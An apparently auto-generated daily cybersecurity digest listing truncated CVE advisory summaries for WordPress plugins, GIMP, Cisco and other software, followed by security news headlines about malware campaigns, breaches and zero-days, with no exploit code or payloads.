00:16 KSA
The Payment Gateway for Redsys & WooCommerce Lite plugin for WordPress is vulnerable to Improper Verification of Cryptographic Signature in versions up to, and including, 7.0.0 due to successful_request() handlers calculating a local signature but not validating Ds_Signature from…
CVE-2026-6351
MailGates/MailAudit developed by Openfind has a CRLF Injection vulnerability, allowing unauthenticated remote attackers
20:00 KSA
MailGates/MailAudit developed by Openfind has a CRLF Injection vulnerability, allowing unauthenticated remote attackers to exploit this vulnerability to read system files.
CVE-2026-6126
A weakness has been identified in zhayujie chatgpt-on-wechat CowAgent 2.0.4. The affected element is an unknown function
05:16 KSA
A weakness has been identified in zhayujie chatgpt-on-wechat CowAgent 2.0.4. The affected element is an unknown function of the component Administrative HTTP Endpoint. This manipulation causes missing authentication. It is possible to initiate the attack remotely. The exploit has…
CVE-2026-6129
A vulnerability was detected in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects an unknown function of the
09:00 KSA
A vulnerability was detected in zhayujie chatgpt-on-wechat CowAgent up to 2.0.4. This affects an unknown function of the component Agent Mode Service. Performing a manipulation results in missing authentication. The attack can be initiated remotely. The exploit is now public and …
CVE-2026-6130
A flaw has been found in chatboxai chatbox up to 1.20.0. This impacts the function StdioClientTransport of the file src/
15:16 KSA
A flaw has been found in chatboxai chatbox up to 1.20.0. This impacts the function StdioClientTransport of the file src/main/mcp/ipc-stdio-transport.ts of the component Model Context Protocol Server Management System. Executing a manipulation of the argument args/env can lead to …
CVE-2026-6142
A vulnerability was identified in tushar-2223 Hotel Management System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. Af
21:18 KSA
A vulnerability was identified in tushar-2223 Hotel Management System up to bb1f3b3666124b888f1e4bcf51b6fba9fbb01d15. Affected by this vulnerability is an unknown functionality of the file /admin/roomdelete.php. The manipulation of the argument ID leads to sql injection. Remote e…
CVE-2026-6148
A vulnerability was detected in code-projects Vehicle Showroom Management System 1.0. Affected by this vulnerability is
21:18 KSA
A vulnerability was detected in code-projects Vehicle Showroom Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /util/MonthTotalReportUpdateFunction.php. Performing a manipulation of the argument BRANCH_ID results in sql injection. The…
CVE-2026-6149
A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Affected by this issue is some unknown fu
21:18 KSA
A flaw has been found in code-projects Vehicle Showroom Management System 1.0. Affected by this issue is some unknown functionality of the file /util/BookVehicleFunction.php. Executing a manipulation of the argument BRANCH_ID can lead to sql injection. The attack may be performed…
CVE-2026-6151
A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown co
23:32 KSA
A vulnerability was found in code-projects Vehicle Showroom Management System 1.0. This vulnerability affects unknown code of the file /util/PaymentStatusFunction.php. The manipulation of the argument CUSTOMER_ID results in sql injection. It is possible to launch the attack remot…
CVE-2026-6152
A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown
23:32 KSA
A vulnerability was determined in code-projects Vehicle Showroom Management System 1.0. This issue affects some unknown processing of the file /util/StaffAddingFunction.php. This manipulation of the argument STAFF_ID causes sql injection. The attack can be initiated remotely. The…
CVE-2026-3876
The Prismatic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'prismatic_encoded' pseudo-short
00:16 KSA
The Prismatic plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'prismatic_encoded' pseudo-shortcode in all versions up to, and including, 3.7.3. This is due to insufficient input sanitization and output escaping on user-supplied attributes within the 'pri…
CVE-2018-25257
Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate
05:16 KSA
Adianti Framework 5.5.0 and 5.6.0 contains an SQL injection vulnerability that allows authenticated users to manipulate database queries by injecting SQL code through the name field in SystemProfileForm. Attackers can submit crafted SQL statements in the profile edit endpoint to …
CVE-2019-25693
ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL q
05:16 KSA
ResourceSpace 8.6 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the keywords parameter in collection_edit.php. Attackers can submit POST requests with crafted SQL payloads in the ke…
CVE-2019-25699
Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authentic
05:16 KSA
Newsbull Haber Script 1.0.0 contains multiple SQL injection vulnerabilities in the search parameter that allow authenticated attackers to extract database information through time-based, blind, and boolean-based injection techniques. Attackers can inject malicious SQL code throug…
CVE-2019-25703
ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipul
09:00 KSA
ImpressCMS 1.3.11 contains a time-based blind SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the 'bid' parameter. Attackers can send POST requests to the admin.php endpoint with malicious 'bid' values c…
CVE-2019-25707
eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL qu
09:00 KSA
eBrigade ERP 4.5 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the 'id' parameter. Attackers can send GET requests to pdf.php with crafted SQL payloads in the 'id' parameter to extr…
CVE-2019-25713
MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL querie
09:00 KSA
MyT-PM 1.5.1 contains an SQL injection vulnerability that allows authenticated attackers to execute arbitrary SQL queries by injecting malicious code through the Charge[group_total] parameter. Attackers can submit crafted POST requests to the /charge/admin endpoint with error-bas…
CVE-2026-35632
OpenClaw through 2026.2.22 contains a symlink traversal vulnerability in agents.create and agents.update handlers that u
05:16 KSA
OpenClaw through 2026.2.22 contains a symlink traversal vulnerability in agents.create and agents.update handlers that use fs.appendFile on IDENTITY.md without symlink containment checks. Attackers with workspace access can plant symlinks to append attacker-controlled content to …
CVE-2026-40500
ProcessWire CMS version 3.0.255 and prior contain a server-side request forgery vulnerability in the admin panel's 'Add
10:55 KSA
ProcessWire CMS version 3.0.255 and prior contain a server-side request forgery vulnerability in the admin panel's 'Add Module From URL' feature that allows authenticated administrators to supply arbitrary URLs to the module download parameter, causing the server to issue outboun…
CVE-2026-3773
The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter
02:00 KSA
The Accessibility Suite by Ability, Inc plugin for WordPress is vulnerable to SQL Injection via the 'scan_id' parameter in all versions up to, and including, 4.20. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existi…
CVE-2026-40503
OpenHarness prior to commit dd1d235 contains a path traversal vulnerability that allows remote gateway users with chat a
10:55 KSA
OpenHarness prior to commit dd1d235 contains a path traversal vulnerability that allows remote gateway users with chat access to read arbitrary files by supplying path traversal sequences to the /memory show slash command. Attackers can manipulate the path input parameter to esca…
CVE-2026-6385
A flaw was found in FFmpeg. A remote attacker could exploit this vulnerability by providing a specially crafted MPEG-PS/
10:55 KSA
A flaw was found in FFmpeg. A remote attacker could exploit this vulnerability by providing a specially crafted MPEG-PS/VOB media file containing a malicious DVD subtitle stream. This vulnerability is caused by a signed integer overflow in the DVD subtitle parser's fragment reass…
CVE-2025-13364
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnera
02:00 KSA
The WP Maps – Store Locator,Google Maps,OpenStreetMap,Mapbox,Listing,Directory & Filters plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'put_wpgm' shortcode in all versions up to, and including, 4.8.7. This is due to insufficient input sanitization and …
CVE-2026-1572
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cro
04:09 KSA
The Livemesh Addons for Elementor plugin for WordPress is vulnerable to unauthorized modification of data and Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 9.0. This is due to missing authorization checks on the AJAX handler `lae_admin_ajax…
CVE-2026-2840
The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Sc
04:09 KSA
The Email Encoder – Protect Email Addresses and Phone Numbers plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'eeb_mailto' shortcode in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping. This makes it pos…
CVE-2026-3299
The WP YouTube Lyte plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lyte' shortcode
21:39 KSA
The WP YouTube Lyte plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'lyte' shortcode in all versions up to, and including, 1.7.29 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for …
CVE-2026-3875
The BetterDocs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'betterdocs_feedback_form' shor
04:09 KSA
The BetterDocs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'betterdocs_feedback_form' shortcode in all versions up to, and including, 4.3.8. This is due to insufficient input sanitization and output escaping on user supplied shortcode attributes. Thi…
CVE-2026-3878
The WP Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpdocs_options[icon_size]' parame
21:39 KSA
The WP Docs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'wpdocs_options[icon_size]' parameter in all versions up to, and including, 2.2.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, …
CVE-2026-3885
The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the
21:39 KSA
The WP Shortcodes Plugin — Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_box' shortcode in all versions up to, and including, 7.4.9 due to insufficient input sanitization and output escaping on user supplied attributes.…
CVE-2026-5070
The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions
02:00 KSA
The Vantage theme for WordPress is vulnerable to Stored Cross-Site Scripting via Gallery block text content in versions up to, and including, 1.20.32 due to insufficient output escaping in the gallery template. This makes it possible for authenticated attackers, with contributor-…
CVE-2026-20170
A vulnerability in the Desktop Agent functionality of Cisco Webex Contact Center could have allowed an unauthenticated,
08:54 KSA
A vulnerability in the Desktop Agent functionality of Cisco Webex Contact Center could have allowed an unauthenticated, remote attacker to conduct cross-site scripting attacks. Cisco has addressed this vulnerability in the Cisco Webex Contact Center service, and no customer actio…
CVE-2026-3355
The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘crsea
04:09 KSA
The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘crsearch’ parameter in all versions up to, and including, 5.101.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthentica…
CVE-2026-4032
The CodeColorer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in 'cc' comm
02:00 KSA
The CodeColorer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' parameter in 'cc' comment shortcode in versions up to, and including, 0.10.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated at…
CVE-2026-40919
A flaw was found in GIMP. This vulnerability, a buffer overflow in the `file-seattle-filmworks` plugin, can be exploited
08:54 KSA
A flaw was found in GIMP. This vulnerability, a buffer overflow in the `file-seattle-filmworks` plugin, can be exploited when a user opens a specially crafted Seattle Filmworks file. A remote attacker could leverage this to cause a denial of service (DoS), leading to the plugin c…
CVE-2026-20161
A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent could allow an authenticated, local attacker with low
06:48 KSA
A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent could allow an authenticated, local attacker with low privileges to overwrite arbitrary files on the local system of an affected device.
This vulnerability is due to improper access controls on files that are on…
CVE-2026-40915
A flaw was found in GIMP. A remote attacker could exploit an integer overflow vulnerability in the FITS image loader by
08:54 KSA
A flaw was found in GIMP. A remote attacker could exploit an integer overflow vulnerability in the FITS image loader by providing a specially crafted FITS file. This integer overflow leads to a zero-byte memory allocation, which is then subjected to a heap buffer overflow when pr…
CVE-2026-40918
A flaw was found in GIMP. Processing a specially crafted PVR image file with large dimensions can lead to a denial of se
08:54 KSA
A flaw was found in GIMP. Processing a specially crafted PVR image file with large dimensions can lead to a denial of service (DoS). This occurs due to a stack-based buffer overflow and an out-of-bounds read in the PVR image loader, causing the application to crash. Systems that …
CVE-2026-6245
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PA
08:54 KSA
A flaw was found in the System Security Services Daemon (SSSD). The pam_passkey_child_read_data() function within the PAM passkey responder fails to properly handle raw bytes received from a pipe. Because the data is treated as a NUL-terminated C string without explicit terminati…
CVE-2026-3369
The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Stored Cross-Site Scripting v
04:09 KSA
The Better Find and Replace – AI-Powered Suggestions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via uploaded image title in versions up to, and including, 1.7.9 due to insufficient input sanitization and output escaping. This makes it possible for authentic…
CVE-2026-6383
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly
08:54 KSA
A flaw was found in KubeVirt's Role-Based Access Control (RBAC) evaluation logic. The authorization mechanism improperly truncates subresource names, leading to incorrect permission evaluations. This allows authenticated users with specific custom roles to gain unauthorized acces…
CVE-2026-0718
The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthor
04:09 KSA
The Post Grid Gutenberg Blocks for News, Magazines, Blog Websites – PostX plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ultp_shareCount_callback() function in all versions up to, and including, 5.0.5. This makes i…
CVE-2026-20152
A vulnerability in the authentication service feature of Cisco AsyncOS Software for Cisco Secure Web Appliance could all
06:48 KSA
A vulnerability in the authentication service feature of Cisco AsyncOS Software for Cisco Secure Web Appliance could allow an unauthenticated, remote attacker to bypass authentication policy requirements.
This vulnerability is due to improper validation of user-supplied authen…
CVE-2026-3581
The Basic Google Maps Placemarks plugin for WordPress is vulnerable to authorization bypass in versions up to, and inclu
02:00 KSA
The Basic Google Maps Placemarks plugin for WordPress is vulnerable to authorization bypass in versions up to, and including, 1.10.7. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attack…
CVE-2026-3595
The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and inclu
02:00 KSA
The Riaxe Product Customizer plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 2.1.2. This is due to the plugin registering a REST API route at POST /wp-json/InkXEProductDesignerLite/customer/delete_customer without a permission_call…
CVE-2026-4160
The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulne
04:09 KSA
The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Insecure Direct Object Reference via the 'submission_id' parameter in versions up to, and including, 6.1.21. This is due to missing authorization and o…
CVE-2026-40916
A flaw was found in GIMP. A stack buffer overflow vulnerability in the TIM image loader's 4BPP decoding path allows a lo
08:54 KSA
A flaw was found in GIMP. A stack buffer overflow vulnerability in the TIM image loader's 4BPP decoding path allows a local user to cause a Denial of Service (DoS). By opening a specially crafted TIM image file, the application crashes due to an unconditional overflow when writin…
CVE-2026-40917
A flaw was found in GIMP. This vulnerability, a heap buffer over-read in the `icns_slurp()` function, occurs when proces
08:54 KSA
A flaw was found in GIMP. This vulnerability, a heap buffer over-read in the `icns_slurp()` function, occurs when processing specially crafted ICNS image files. An attacker could provide a malicious ICNS file, potentially leading to application crashes or information disclosure o…
⚠️ Threat Intelligence
48 threats
rss:Recorded Future
—
02:48 KSA
<strong>From Bazooka to Fake Nikes</strong>
Investigation reveals business impersonation fraud schemes ranging from fake companies cashing stolen checks to AI-powered shopping scams. The analysis exposes common vulnerabilities exploited across both traditional and modern fraud t…
rss:Dark Reading
—
02:48 KSA
<strong>North Korea Uses ClickFix to Target macOS Users' Data</strong>
North Korean APT group Sapphire Sleet is conducting social engineering attacks against macOS users through fake job offers and fraudulent Zoom updates. The ClickFix technique is used to steal credentials…
rss:BleepingComputer
—
02:48 KSA
<strong>New Microsoft Defender “RedSun” zero-day PoC grants SYSTEM privileges</strong>
A cybersecurity researcher has released a proof-of-concept exploit for a zero-day vulnerability in Microsoft Defender called "RedSun" that allows attackers to gain SYSTEM-level privileges. Thi…
rss:CISA Advisories
—
02:48 KSA
<strong>AVEVA Pipeline Simulation</strong>
A critical vulnerability in AVEVA Pipeline Simulation allows unauthenticated attackers to modify simulation parameters and training configurations. All versions up to 2025_SP1_build_7.1.9497.63 are affected, posing risks to industrial c…
rss:Dark Reading
—
01:36 KSA
<strong>'Harmless' Global Adware Transforms Into an AV Killer</strong>
Dragon Boss adware distributed a malicious update in March 2025 that established persistence through scheduled tasks and configured exclusions in Windows Defender to evade detection. The previously …
rss:The Hacker News
—
01:36 KSA
<strong>Newly Discovered PowMix Botnet Hits Czech Workers Using Randomized C2 Traffic</strong>
A new botnet called PowMix has been actively targeting Czech workforce since December 2025, employing randomized command-and-control beaconing intervals to evade detection. This sophis…
rss:CISA Advisories
—
01:36 KSA
<strong>Delta Electronics ASDA-Soft</strong>
Arbitrary code execution vulnerability (CVSS 7.8) discovered in Delta Electronics ASDA-Soft versions up to V7.2.2.0. This affects industrial motor control software and could allow attackers to compromise automation systems.
Source: h…
rss:CISA Advisories
—
01:36 KSA
<strong>Anviz Multiple Products</strong>
Multiple critical vulnerabilities identified in Anviz products allowing attackers to conduct reconnaissance, decrypt sensitive data, alter configurations, gain root access, and execute arbitrary code. These vulnerabilities pose significan…
rss:CISA Advisories
—
01:36 KSA
<strong>Horner Automation Cscape and XL4, XL7 PLC</strong>
Critical vulnerability discovered in Horner Automation Cscape v10.0 and XL4/XL7 PLC systems that could allow unauthorized access to industrial control systems and services. This affects operational technology environment…
rss:SecurityWeek
—
23:18 KSA
<strong>Government Can’t Win the Cyber War Without the Private Sector</strong>
National cybersecurity resilience requires accelerated public-private partnerships. Governments cannot effectively defend against cyber threats without deeper collaboration with private sector organiz…
rss:BleepingComputer
—
23:18 KSA
<strong>Hackers exploit Marimo flaw to deploy NKAbuse malware from Hugging Face</strong>
Hackers are exploiting a critical vulnerability in Marimo reactive Python notebook to deploy NKAbuse malware. The malware is being hosted on Hugging Face Spaces, representing a supply chain …
rss:Dark Reading
—
22:16 KSA
<strong>Microsoft's Original Windows Secure Boot Certificate Is Expiring</strong>
Microsoft's original Windows Secure Boot certificate is expiring, requiring a massive coordinated security update across the Windows ecosystem. Organizations must update their systems promptly…
rss:Dark Reading
—
22:16 KSA
<strong>Two-Factor Authentication Breaks Free from the Desktop</strong>
Threat actors are exploiting security gaps beyond traditional IT environments. Implementing two-factor authentication (2FA) in physical security systems can provide an additional critical defense layer again…
rss:BleepingComputer
—
22:16 KSA
<strong>Google expands Gemini AI use to fight malicious ads on its platform</strong>
Google is expanding its use of Gemini AI models to detect and block malicious advertisements on its platforms as cybercriminals evolve their evasion tactics. This AI-driven approach aims to prot…
rss:SecurityWeek
—
21:00 KSA
<strong>OpenAI Widens Access to Cybersecurity Model After Anthropic’s Mythos Reveal</strong>
OpenAI has expanded access to GPT-5.4-Cyber, a specialized AI model fine-tuned for cybersecurity defenders. This move lowers barriers for legitimate cybersecurity professionals to levera…
rss:The Hacker News
—
21:00 KSA
<strong>ThreatsDay Bulletin: Defender 0-Day, SonicWall Brute-Force, 17-Year-Old Excel RCE and 15 More Stories</strong>
Multiple critical security incidents reported including a zero-day vulnerability in Microsoft Defender, brute-force attacks targeting SonicWall devices, and a 1…
rss:BleepingComputer
—
21:00 KSA
<strong>Most "AI SOCs" Are Just Faster Triage. That's Not Enough.</strong>
Most AI-powered Security Operations Center (SOC) tools only accelerate alert triage rather than reducing actual workload or improving security outcomes. True effectiveness requires end-to-e…
rss:BleepingComputer
—
21:00 KSA
<strong>Most "AI SOCs" Are Just Faster Triage. That's Not Enough.</strong>
Current AI-powered SOC tools primarily accelerate alert triage rather than reducing actual workload for security teams. True operational efficiency requires end-to-end workflow automation t…
rss:BleepingComputer
—
21:00 KSA
<strong>New ATHR vishing platform uses AI voice agents for automated attacks</strong>
ATHR is a new cybercrime platform enabling fully automated voice phishing (vishing) attacks that combine human operators with AI voice agents for credential harvesting. The platform represents …
rss:Malwarebytes Lab
—
19:54 KSA
<strong>“iCloud storage is full” scam is back, and now it wants your payment details</strong>
A phishing campaign targeting Apple users has resurfaced, using fake iCloud storage warnings to create urgency and trick victims into providing payment card details. The scam threatens …
rss:Malwarebytes Lab
—
19:54 KSA
<strong>Browser Guard gets even better with Access Control </strong>
Malwarebytes Browser Guard introduces enhanced Access Control features allowing users to manage website permissions for camera, microphone, location, and notifications. This security enhancement helps prevent u…
rss:The Hacker News
—
19:54 KSA
<strong>[Webinar] Find and Eliminate Orphaned Non-Human Identities in Your Environment</strong>
Compromised service accounts and forgotten API keys caused 68% of cloud breaches in 2024, surpassing phishing and weak passwords. Organizations face 40-50 automated credentials per em…
rss:SecurityWeek
—
18:48 KSA
<strong>Artemis Emerges From Stealth With $70 Million in Funding</strong>
Artemis, a new cybersecurity startup, secured $70 million in funding to develop AI-powered defense solutions. The company focuses on preventing AI-driven attacks across applications, users, machines, and c…
rss:SecurityWeek
—
18:48 KSA
<strong>Splunk Enterprise Update Patches Code Execution Vulnerability</strong>
Splunk released a security update addressing a critical code execution vulnerability that allows low-privileged users to upload files and achieve remote code execution. Organizations using Splunk Ente…
rss:SecurityWeek
—
18:48 KSA
<strong>Data Breach at Tennessee Hospital Affects 337,000</strong>
Cookeville Regional Medical Center suffered a ransomware attack by the Rhysida group, resulting in theft of 500GB of sensitive data affecting 337,000 individuals. This incident highlights the ongoing threat of ra…
rss:The Hacker News
—
18:48 KSA
<strong>Hidden Passenger? How Taboola Routes Logged-In Banking Sessions to Temu</strong>
A bank-approved Taboola tracking pixel was found redirecting logged-in banking sessions to Temu tracking endpoints without the bank's knowledge or user consent. This incident highlights seri…
rss:The Hacker News
—
18:48 KSA
<strong>Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT in Targeted Finance, Crypto Attacks</strong>
A sophisticated social engineering campaign exploits Obsidian note-taking application plugins to deliver PHANTOMPULSE RAT malware. The attacks specifically target individuals in …
rss:The Hacker News
—
18:48 KSA
<strong>Cisco Patches Four Critical Identity Services, Webex Flaws Enabling Code Execution</strong>
Cisco released patches for four critical vulnerabilities in Identity Services and Webex Services that enable arbitrary code execution. Attackers could exploit these flaws to imper…
rss:BleepingComputer
—
18:48 KSA
<strong>Cisco says critical Webex Services flaw requires customer action</strong>
Cisco released security updates for four critical vulnerabilities, including an improper certificate validation flaw in Webex Services that requires customer action. The vulnerability affects the c…
rss:SecurityWeek
—
17:36 KSA
<strong>NIST Prioritizes NVD Enrichment for CVEs in CISA KEV, Critical Software</strong>
NIST announced it will prioritize enrichment of CVE entries that are listed in CISA's Known Exploited Vulnerabilities catalog or affect critical software, rather than enriching all CVEs auto…
rss:SecurityWeek
—
17:36 KSA
<strong>Microsoft Paid Out $2.3 Million at Zero Day Quest 2026 Hacking Contest</strong>
Security researchers discovered over 80 high-impact vulnerabilities in Microsoft's cloud and AI systems during a competitive hacking event with a $5 million prize pool. Microsoft awarded $2.3…
rss:BleepingComputer
—
17:36 KSA
<strong>Data breach at edtech giant McGraw Hill affects 13.5 million accounts</strong>
ShinyHunters extortion group leaked data from 13.5 million McGraw Hill user accounts after breaching the company's Salesforce environment. The breach affects a major educational technology pro…
rss:Mandiant Blog
—
16:32 KSA
<strong>Defending Your Enterprise When AI Models Can Find Vulnerabilities Faster Than Ever</strong>
AI models are now capable of discovering software vulnerabilities at unprecedented speeds, even without being specifically designed for security testing. Organizations must adapt …
rss:Malwarebytes Lab
—
16:32 KSA
<strong>A fake Slack download is giving attackers a hidden desktop on your machine</strong>
A trojanized Slack installer appears legitimate but secretly creates an invisible desktop environment that allows attackers to access user accounts and sensitive data. The malware operate…
rss:SecurityWeek
—
16:32 KSA
<strong>Cisco Patches Critical Vulnerabilities in Webex, ISE</strong>
Cisco has released patches for critical vulnerabilities in Webex and Identity Services Engine (ISE) that allow remote attackers to impersonate users or execute arbitrary commands on the underlying operating sy…
rss:SecurityWeek
—
16:32 KSA
<strong>Ransomware Hits Automotive Data Expert Autovista</strong>
Autovista, a leading automotive data and analysis company, has been hit by a ransomware attack. The company is currently working with external cybersecurity experts to investigate the incident and assess the impac…
rss:Malwarebytes Lab
—
15:25 KSA
<strong>Booking.com breach gives scammers what they need to target guests</strong>
Booking.com suffered a data breach exposing guest reservation data. Scammers are leveraging this stolen information to impersonate hotels and conduct phishing attacks targeting guests to steal pay…
rss:SecurityWeek
—
15:25 KSA
<strong>Claude Code, Gemini CLI, GitHub Copilot Agents Vulnerable to Prompt Injection via Comments</strong>
Security researcher disclosed a new AI attack method called 'Comment and Control' that exploits prompt injection vulnerabilities in popular AI coding assistants including …
rss:BleepingComputer
—
15:25 KSA
<strong>US nationals behind DPRK IT worker 'laptop farm' sent to prison</strong>
Two U.S. nationals were imprisoned for operating a laptop farm scheme that enabled North Korean IT workers to pose as U.S. residents and infiltrate over 100 American companies, including F…
rss:BleepingComputer
—
14:00 KSA
<strong>Microsoft: April Windows Server 2025 update may fail to install</strong>
Microsoft is investigating installation failures of the April KB5082063 security update on Windows Server 2025 systems. This issue may leave affected servers without critical security patches, poten…
rss:Recorded Future
—
12:51 KSA
<strong>Iran War: Future Scenario and Business Implications</strong>
Analysis of potential Iran conflict scenarios and their implications for business operations and cybersecurity posture. Geopolitical tensions with Iran pose significant cyber threats to critical infrastructure …
rss:Dark Reading
—
12:50 KSA
<strong>6-Year Ransomware Campaign Targets Turkish Homes &amp; SMBs</strong>
A six-year ransomware campaign has been targeting Turkish homes and small-to-medium businesses with minimal detection. The prolonged operation highlights how attacks on smaller entities often go unr…
rss:The Hacker News
—
12:50 KSA
<strong>UAC-0247 Targets Ukrainian Clinics and Government in Data-Theft Malware Campaign</strong>
Ukrainian government agencies and healthcare institutions, including clinics and emergency hospitals, are being targeted by UAC-0247 threat actor in a data-theft campaign. The malwa…
rss:Mandiant Blog
—
04:54 KSA
<strong>The German Cyber Criminal Überfall: Shifts in Europe's Data Leak Landscape</strong>
Germany has become the primary target for cyber extortion in Europe, with data leak site posts increasing nearly 50% globally in 2025. German infrastructure is experiencing dispropor…
rss:Dark Reading
—
04:54 KSA
<strong>Critical MCP Integration Flaw Puts NGINX at Risk</strong>
A near-maximum severity vulnerability in nginx-ui allows attackers to restart, create, modify, and delete NGINX configuration files, potentially compromising web server infrastructure. This flaw poses significant …
rss:BleepingComputer
—
04:54 KSA
<strong>New AgingFly malware used in attacks on Ukraine govt, hospitals</strong>
A newly discovered malware family called AgingFly is targeting Ukrainian government entities and hospitals, stealing authentication credentials from Chromium-based browsers and WhatsApp. This target…
rss:BleepingComputer
—
04:54 KSA
<strong>Critical Nginx UI auth bypass flaw now actively exploited in the wild</strong>
A critical authentication bypass vulnerability in Nginx UI with MCP support is being actively exploited in the wild, allowing attackers to achieve complete server takeover without any authenti…
rss:Recorded Future
—
03:48 KSA
<strong>4 Essential Integration Workflows for Operationalizing Threat Intelligence Recorded Future</strong>
Recorded Future outlines four essential integration workflows for operationalizing threat intelligence within existing security infrastructure. The guide covers four stage…
📰 Cybersecurity News
0 articles
No news aggregated today yet
This digest is updated automatically every day — Last updated: Thursday, April 16, 2026
CVE Archive ·
Threats ·
News